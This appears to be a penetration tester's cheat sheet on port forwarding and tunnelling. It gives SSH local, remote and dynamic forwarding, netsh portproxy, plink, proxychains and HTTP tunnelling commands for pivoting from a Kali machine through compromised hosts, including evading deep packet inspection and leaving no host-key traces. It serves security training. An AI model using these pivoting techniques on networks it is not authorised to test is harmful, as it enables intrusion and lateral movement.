Port Forwarding / Tunneling

Remote Attacks
Port Forwarding
SSH Tunneling
SSH Local Port Forwarding (Unix)
SSH Local Port Forwarding (Windows)
SSH Remote Port Forwarding (Unix)
HTTP Tunneling
VirtualBox

Remote attacks

Forwarding is required for Remote Attacks.

Find my public IP, which is shared by all devices in my network

Public IP is assigned to the router, not to every device in the network.

https://www.whatismyip.com

Configure the router to forward all traffic to public IP port 444 (example) to local IP address

Go to router IP in a browser

# This depends on the router brand:
Router Settings -> Security -> Apps and Gaming -> Single Port Forwarding
Click Add new single port forwarding
Enter Kali Linux IP in IP Adress
Enter port 444
Enter Both as protocol (TCP & UDP)

Port Forwarding

Redirect traffic destined for one IP:port to another IP:port.

Using rinetd

Install port forwarding tool rinetd

sudo apt install rinetd

Rules for forwarding are in a configuration file (bind=listening, connect=destination).

cat /etc/rinetd.conf
sudo nano /etc/rinetd.conf
# bindadress bindport connectaddress connectport
0.0.0.0 80 <destination IP> 80

Restart the rinetd service to apply the rules

sudo service rinetd restart
sudo ss -antp | grep "80"

SSH Tunneling

SSH Local Port Forwarding (Unix)

Tunnel a local port to a remote server using SSH as the transport protocol. Usually to use Kali tools on a target machine separated with a jumper machine with 2 network interfaces.

Kali machine -> jumper machine -> target machine

On Kali Linux

JUMPER_IP=x.x.x.x
TARGET_IP=y.y.y.y
TARGET_PORT=22
LOCAL_PORT=12345
# ssh -L [LOCAL_IP:]LOCAL_PORT:DESTINATION:DESTINATION_PORT [USER@]SSH_SERVER
ssh -L 127.0.0.1:${LOCAL_PORT}:${TARGET_IP}:${TARGET_PORT} user@${JUMPER_IP}
# Using key to connect on jumper machine
ssh -L 127.0.0.1:${LOCAL_PORT}:${TARGET_IP}:${TARGET_PORT} -i ssh-keypair user@${JUMPER_IP}

Open another terminal window

nc 127.0.0.1 ${LOCAL_PORT}

# When target port is for SSH
ssh ${TARGET_USER}@127.0.0.1 -p ${LOCAL_PORT}

# Target port is TARGET_PORT=443
sslscan --verbose --show-certificate --xml=./sslscan.xml 127.0.0.1:12345

SSH Local Port Forwarding (Windows)

Scenario: Windows host is accessible from Kali and was compromised. The Windows host has 2 network interfaces, one is not directly accessible from Kali. Create a SSH local port forwarding to be able to access this network from Kali.

Requires:

  • SYSTEM privileges on the Windows machine (or would need to bypass UAC)
  • The IP Helper service must be running with IPv6 support enabled for the network interface. Enabled by default.
  • Use netsh, installed by default on modern Windows versions

Windows

# IP1: IP accessible by Kali
# IP2: IP on the other network not accessible by Kali
netsh interface portproxy add v4tov4 listenport=4455 listenaddress=<IP1> connectport=445 connectaddress=<IP2>
netstat -anp TCP | find "4455"
#netsh advfirewall firewall delete rule name="forward_port_rule"
netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=<IP1> localport=4455 action=allow

Kali

sudo nmap -sS -sV <IP1> -p 4455

SSH Remote Port Forwarding (Unix)

A port is opened on the remote side of the connection and traffic sent to that port is forwarded to a port on our local machine (the machine initiating the SSH client). Connections to the specified TCP port on the remote host will be forwarded to the specified port on the local machine.

Can be run as non-root users, use ports 1024+.

Example: on the target, use remote port forwarding of NFS port (2049, not 111) to Kali so we can mount the NFS on Kali.

On Kali, start the SSH service

sudo service ssh start

On the target machine

KALI_IP=x.x.x.x
TARGET_IP=y.y.y.y
TARGET_PORT=3306
LOCAL_PORT=2221
ssh -N -R [bind_address:]port:host:hostport [username@address]
ssh -N -R ${KALI_IP}:${LOCAL_PORT}:127.0.0.1:${TARGET_PORT} kali@${KALI_IP}

# Add these flags to automatically accept hostkey of kali machine and not save it to the compromised host...
ssh -N -R ${KALI_IP}:${LOCAL_PORT}:127.0.0.1:${TARGET_PORT} -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" kali@${KALI_IP}

This will foward all traffic to Kali’s LOCAL_PORT to port TARGET_PORT on the the target.

On Kali

sudo nmap -sS -sV 127.0.0.1 -p ${LOCAL_PORT}

SSH Remote Port Forwarding (Windows)

Transfer plink.exe from Kali to the Windows machine. See File Transfer. Click Here for latest version of plink.exe.

/usr/share/windows-resources/binaries/plink.exe

On Windows

Help

plink.exe

Remote port forwarding. The cmd/echo is to pipe the answer “y” to the prompt (interactive mode).

cmd.exe /c echo y | plink.exe -ssh -l kali -pw **** -R $KALI_IP:1234:127.0.0.1:3306 $KALI_IP

Kali

sudo nmap -sS -sV 127.0.0.1 -p 1234

SSH Dynamic Port Forwarding (Unix & Windows)

Set a local listening port and have it tunnel incoming traffic to any remote destination through the use of a proxy.

On Kali

Kali machine -> jumper machine (Unix or Windows) -> target machine

FIRST: Configure a local SOCKS5 proxy in /etc/proxychains4.conf, tunnels through the jump server. See ProxyChains.

JUMPER_IP=x.x.x.x
TARGET_IP=y.y.y.y
LOCAL_PORT=8080
USER=joe

For Windows, install and configure OpenSSH.

❗ May require other options used with ssh command to jump server, like -p, -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss

#ssh -N -D <address to bind to>:<port to bind to> <username>@<SSH server address>
sudo ssh -N -D 127.0.0.1:${LOCAL_PORT} <username>@${JUMPER_IP}
sudo ssh -N -D 127.0.0.1:${LOCAL_PORT} ${USER}@${JUMPER_IP}

To run tools through the SOCKS4 proxy, prepend each command with ProxyChains.

❗ SOCKS proxies require a TCP connection to be made. SYN scan or ICMP cannot get through (disable pinging with the -Pn)

sudo proxychains nmap -Pn -sT ... $TARGET_IP

On Kali (Double jump – let’s have some fun)

Kali machine -> jumper machine 1 -> jumper machine 2 -> target machine

FIRST: Configure a local SOCKS5 proxy in /etc/proxychains4.conf, tunnels through the jump server. See ProxyChains.

JUMPER1=x.x.x.x
JUMPER2=y.y.y.y
TARGET_IP=z.z.z.z
LOCAL_PORT=8082
USER1=alice
USER2=bob
sudo ssh -J ${USER1}@${JUMPER1} ${USER2}@${JUMPER2} -p 22 -D $LOCAL_PORT -N
[password USER1]
[password USER2]
sudo proxychains nmap -Pn -sT ... $TARGET_IP

HTTP Tunneling

Use HTTP Tunneling when the SSH protocol is not allowed by Deep Packet Inspection. Uses a client/server model to encapsulate traffic within HTTP requests.

  • Kali (HTTP client) -> Jumper (HTTP server) -> Target machine
  • Target machine (SSH local port forwarding) -> Jumper

Install HTTPtunnel

sudo apt install httptunnel

Jumper (compromised)

SSH Local port forwarding between Jumper and Target (RDP port)

ssh -L 0.0.0.0:8888:${TARGET_IP}:3389 <username>@127.0.0.1
ss -antp | grep "8888"

Start the HTTPtunnel server

hts --forward-port localhost:8888 1234
ss -antp | grep "1234"

Kali

Start the HTTPtunnel client

htc --forward-port 8080 ${JUMPER_IP}:1234
ss -antp | grep "8080"

Use the tunnel to connect to the Target

rdesktop 127.0.0.1:8080

VirtualBox

Access web server running on Guest VM (Kali) from the Host (Windows)

On Host (Windows):

ipconfig

Host IP (Windows): Ethernet from the VPN (if any) or local network
Guest IP (Kali): Ethernet VirtualBox Host-Only Network

  • Click on Machine->Settings-Network
  • Under the Network Adapter using NAT, click on Port Forwarding.
  • Click on the Add button.
    • Name: Apache
    • Protocol: TCP
    • Host IP:
      • Option 1: enter Host IP (Windows). Accessible for everyone on the network!
      • Option 2: enter “127.0.0.1”. Only accessible from Host.
    • Host Port: 80
    • Guest IP: leave empty
    • Guest Port: 80
  • Open a browser on the Host and navigate to http://<Host IP or 127.0.0.1>. NOT the guest IP!